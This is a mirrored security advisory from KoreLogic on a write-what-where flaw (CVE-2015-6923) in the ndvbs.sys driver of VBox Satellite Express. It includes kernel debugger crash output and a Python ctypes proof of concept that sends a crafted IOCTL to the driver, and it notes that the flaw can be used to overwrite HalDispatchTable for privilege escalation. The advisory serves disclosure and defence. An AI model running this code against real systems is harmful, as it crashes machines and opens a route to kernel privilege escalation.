Skip to content
cyberexploits
doswindowstext

VBox Satellite Express 2.3.17.3 - Arbitrary Write

VBox Satellite Express 2.3.17.3 - Arbitrary Write

Published on 2015-09-17

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/dos/38225.txt7eac4c3a
raw
KL-001-2015-005 : VBox Satellite Express Arbitrary Write Privilege Escalation



Title: VBox Satellite Express Arbitrary Write Privilege Escalation

Advisory ID: KL-001-2015-005

Publication Date: 2015.09.16

Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-005.txt





1. Vulnerability Details



     Affected Vendor: VBox Communications

     Affected Product: Satellite Express Protocol

     Affected Version: 2.3.17.3

     Platform: Microsoft Windows XP SP3, Microsoft Windows 7 (x86)

     CWE Classification: CWE-123: Write-what-where condition

     Impact: Arbitrary Code Execution

     Attack vector: IOCTL

     CVE-ID: CVE-2015-6923



2. Vulnerability Description



     A vulnerability within the ndvbs module allows an attacker

     to inject memory they control into an arbitrary location they

     define. This vulnerability can be used to overwrite function

     pointers in HalDispatchTable resulting in an elevation of

     privilege.



3. Technical Description



     Example against Windows XP:



     Windows XP Kernel Version 2600 (Service Pack 3) UP Free x86 compatible

     Product: WinNt, suite: TerminalServer SingleUserTS

     Built by: 2600.xpsp_sp3_qfe.101209-1646

     Machine Name:

     Kernel base = 0x804d7000 PsLoadedModuleList = 0x805540c0

     Debug session time: Tue Mar 10 18:57:54.259 2015 (UTC - 7:00)

     System Uptime: 0 days 0:11:19.843



     *********************************************************************

     *                                                                   *

     *                        Bugcheck Analysis                          *

     *                                                                   *

     *********************************************************************



     Use !analyze -v to get detailed debugging information.

     BugCheck 50, {b41c5d4c, 0, 805068e1, 0}

     Probably caused by : ndvbs.sys ( ndvbs+94f )

     Followup: MachineOwner

     ---------



     kd> kn

     Call stack:  # ChildEBP RetAddr

     00 f64fda98 8051cc7f nt!KeBugCheckEx+0x1b

     01 f64fdaf8 805405d4 nt!MmAccessFault+0x8e7

     02 f64fdaf8 805068e1 nt!KiTrap0E+0xcc

     03 f64fdbb0 80506aae nt!MmMapLockedPagesSpecifyCache+0x211

     04 f64fdbd0 f650e94f nt!MmMapLockedPages+0x18

     05 f64fdc34 804ee129 ndvbs+0x94f

     06 f64fdc44 80574e56 nt!IopfCallDriver+0x31

     07 f64fdc58 80575d11 nt!IopSynchronousServiceTail+0x70

     08 f64fdd00 8056e57c nt!IopXxxControlFile+0x5e7

     09 f64fdd34 8053d6d8 nt!NtDeviceIoControlFile+0x2a

     0a f64fdd34 7c90e514 nt!KiFastCallEntry+0xf8

     0b 0021f3e4 7c90d28a ntdll!KiFastSystemCallRet

     0c 0021f3e8 1d1add7a ntdll!ZwDeviceIoControlFile+0xc

     0d 0021f41c 1d1aca96 _ctypes!DllCanUnloadNow+0x5b4a

     0e 0021f44c 1d1a8db8 _ctypes!DllCanUnloadNow+0x4866

     0f 0021f4fc 1d1a959e _ctypes!DllCanUnloadNow+0xb88

     10 0021f668 1d1a54d8 _ctypes!DllCanUnloadNow+0x136e

     11 0021f6c0 1e07bd9c _ctypes+0x54d8

     12 00000000 00000000 python27!PyObject_Call+0x4c





     Example against Windows 7:



     Microsoft (R) Windows Debugger Version 6.3.9600.17298 X86

     Copyright (c) Microsoft Corporation. All rights reserved.

     Windows 7 Kernel Version 7601 (Service Pack 1) UP Free x86 compatible

     Product: WinNt, suite: TerminalServer SingleUserTS Personal

     Built by: 7601.17514.x86fre.win7sp1_rtm.101119-1850

     Kernel base = 0x8280c000 PsLoadedModuleList = 0x82956850

     Debug session time: Tue Sep 15 15:08:38.938 2015 (UTC - 7:00)

     System Uptime: 0 days 0:27:26.358

     kd> .symfix;.reload

     Loading Kernel Symbols

     ...............................................................

     ................................................................

     ........................

     Loading User Symbols

     Loading unloaded module list

     ........

     kd> !analyze -v

     **********************************************************************

     *                                                                    *

     *                        Bugcheck Analysis                           *

     *                                                                    *

     **********************************************************************



     KERNEL_MODE_EXCEPTION_NOT_HANDLED_M (1000008e)

     This is a very common bugcheck.  Usually the exception address pinpoints

     the driver/function that caused the problem.  Always note this address

     as well as the link date of the driver/image that contains this address.

     Some common problems are exception code 0x80000003.  This means a hard

     coded breakpoint or assertion was hit, but this system was booted

     /NODEBUG.  This is not supposed to happen as developers should never have

     hardcoded breakpoints in retail code, but ...

     If this happens, make sure a debugger gets connected, and the

     system is booted /DEBUG.  This will let us see why this breakpoint is

     happening.

     Arguments:

     Arg1: c0000005, The exception code that was not handled

     Arg2: 929ef938, The address that the exception occurred at

     Arg3: 974f4a34, Trap Frame

     Arg4: 00000000



     Debugging Details:

     ------------------



     EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx

referenced memory at 0x%08lx. The memory could not be %s.

     FAULTING_IP:

     ndvbs+938

     929ef938 8b4604          mov     eax,dword ptr [esi+4]



     TRAP_FRAME:  974f4a34 -- (.trap 0xffffffff974f4a34)

     ErrCode = 00000000

     eax=00000000 ebx=85490880 ecx=85de2ae0 edx=85490810 esi=85490810 edi=8460a668

     eip=929ef938 esp=974f4aa8 ebp=974f4afc iopl=0         nv up ei pl zr na pe nc

     cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246

     ndvbs+0x938:

     929ef938 8b4604          mov     eax,dword ptr [esi+4]

     Resetting default scope

     CUSTOMER_CRASH_COUNT:  1

     DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

     BUGCHECK_STR:  0x8E

     PROCESS_NAME:  python.exe

     CURRENT_IRQL:  0

     ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre

     LAST_CONTROL_TRANSFER:  from 82843593 to 929ef938

     STACK_TEXT:

     WARNING: Stack unwind information not available. Following frames may be wrong.

     974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938

     974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63

     974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8

     974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa

     974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a

     974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a

     0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4



     STACK_COMMAND:  kb

     FOLLOWUP_IP:

     ndvbs+938

     929ef938 8b4604          mov     eax,dword ptr [esi+4]



     SYMBOL_STACK_INDEX:  0

     SYMBOL_NAME:  ndvbs+938

     FOLLOWUP_NAME:  MachineOwner

     MODULE_NAME: ndvbs

     IMAGE_NAME:  ndvbs.sys

     DEBUG_FLR_IMAGE_TIMESTAMP:  3ec77b36

     BUCKET_ID:  OLD_IMAGE_ndvbs.sys

     FAILURE_BUCKET_ID:  OLD_IMAGE_ndvbs.sys

     ANALYSIS_SOURCE:  KM

     FAILURE_ID_HASH_STRING:  km:old_image_ndvbs.sys

     FAILURE_ID_HASH:  {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75}

     Followup: MachineOwner

     ---------



4. Mitigation and Remediation Recommendation



     No response from vendor; no remediation available.



5. Credit



     This vulnerability was discovered by Matt Bergin of KoreLogic

     Security, Inc.



6. Disclosure Timeline



     2015.05.19 - KoreLogic requests a security contact from

                  info@vboxcomm.com.

     2015.05.29 - KoreLogic requests a security contact from

                  {info,sales,marketing}@vboxcomm.com.

     2015.08.03 - 45 business days have elapsed since KoreLogic's last

                  contact attempt.

     2015.09.11 - KoreLogic requests CVE from Mitre.

     2015.09.12 - Mitre issues CVE-2015-6923.

     2015.09.16 - Public disclosure.



7. Proof of Concept



     from sys import exit

     from ctypes import *

     NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory

     WriteProcessMemory = windll.kernel32.WriteProcessMemory

     DeviceIoControl = windll.ntdll.NtDeviceIoControlFile

     CreateFileA = windll.kernel32.CreateFileA

     CloseHandle = windll.kernel32.CloseHandle

     FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1

     OPEN_EXISTING = 3

     NULL = None



     device = "ndvbs"

     code = 0x00000ffd

     inlen = 0x0

     outlen = 0x0

     inbuf = 0x1

     outbuf = 0xffff0000

     inBufMem = "\x90"*inlen



     def main():

     	try:

      		handle = CreateFileA("\\\\.\\%s" %

(device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)

      		if (handle == -1):

                             print "[-] error creating handle"

                             exit(1)

      	except Exception as e:

      		print "[-] error creating handle"

      		exit(1)



#NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)



DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen)

      	CloseHandle(handle)

      	return False



     if __name__=="__main__":

     	main()





The contents of this advisory are copyright(c) 2015

KoreLogic, Inc. and are licensed under a Creative Commons

Attribution Share-Alike 4.0 (United States) License:

http://creativecommons.org/licenses/by-sa/4.0/



KoreLogic, Inc. is a founder-owned and operated company with a

proven track record of providing security services to entities

ranging from Fortune 500 to small and mid-sized companies. We

are a highly skilled team of senior security consultants doing

by-hand security assessments for the most important networks in

the U.S. and around the world. We are also developers of various

tools and resources aimed at helping the security community.

https://www.korelogic.com/about-korelogic.html



Our public vulnerability disclosure policy is available at:

https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt







View on GitHub